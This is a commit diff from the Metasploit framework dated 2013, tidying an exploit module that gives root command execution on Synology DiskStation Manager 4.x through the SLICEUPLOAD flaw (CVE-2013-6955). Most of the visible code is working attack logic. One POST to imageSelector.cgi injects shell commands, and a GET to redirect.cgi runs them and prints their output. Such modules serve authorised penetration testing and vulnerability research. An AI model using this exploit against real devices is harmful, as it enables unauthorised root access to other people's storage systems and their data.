Merge pull request #2 from jvazquez-r7/review_2787

mwulftange · mwulftange · commit 13a4c62b0dc4 · 2013-12-20T09:53:23.000-08:00
Do final (minor) cleanup
diff --git a/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb
@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "Synology DiskStation Manager SLICEUPLOAD Unauthenticated Remote Command Execution",
+      'Name'           => "Synology DiskStation Manager SLICEUPLOAD Remote Command Execution",
       'Description'    => %q{
         This module exploits a vulnerability found in Synology DiskStation Manager (DSM)
         versions 4.x, which allows the execution of arbitrary commands under root
@@ -32,7 +32,10 @@ def initialize(info={})
         [
           'Markus Wulftange' # Discovery, Metasploit module
         ],
-      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2013-6955' ],
+        ],
       'Privileged'     => false,
       'Platform'       => ['unix'],
       'Arch'           => ARCH_CMD,
@@ -51,11 +54,8 @@ def initialize(info={})
           ['Automatic', {}]
         ],
       'DefaultTarget'  => 0,
-      'DisclosureDate' => 'Oct 31 2013',
-      'References'     =>
-        [
-          ['CVE', '2013-6955'],
-        ]
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => 'Oct 31 2013'
     ))
 
     register_options(
@@ -124,6 +124,7 @@ def exploit
     post_body.gsub!(/\r\n(--#{mime_msg.bound})/, '  \\1')
 
     # send request to append shell commands
+    print_status("#{peer} - Injecting the payload...")
     res = send_request_cgi({
       'method'  => 'POST',
       'uri'     => '/webman/imageSelector.cgi',
@@ -136,23 +137,25 @@ def exploit
     })
 
     unless res and res.code == 200 and res.body.include?('error_noprivilege')
-      print_error("#{peer} - Unexpected response, probably the exploit failed")
-      return
+      fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed")
     end
 
     # send request to invoke the injected shell commands
+    print_status("#{peer} - Executing the payload...")
     res = send_request_cgi({
       'method' => 'GET',
       'uri'    => '/redirect.cgi'
     })
 
-    unless res and res.code == 200
-      print_error("#{peer} - Unexpected response, probably the exploit failed")
-      return
-    end
+    # Read command output if cmd/unix/generic payload was used
+    if datastore['CMD']
+      unless res and res.code == 200
+        fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed")
+      end
 
-    print_good("#{peer} - Command successfully executed")
-    print_line(res.body)
+      print_good("#{peer} - Command successfully executed")
+      print_line(res.body)
+    end
   end
 end
 
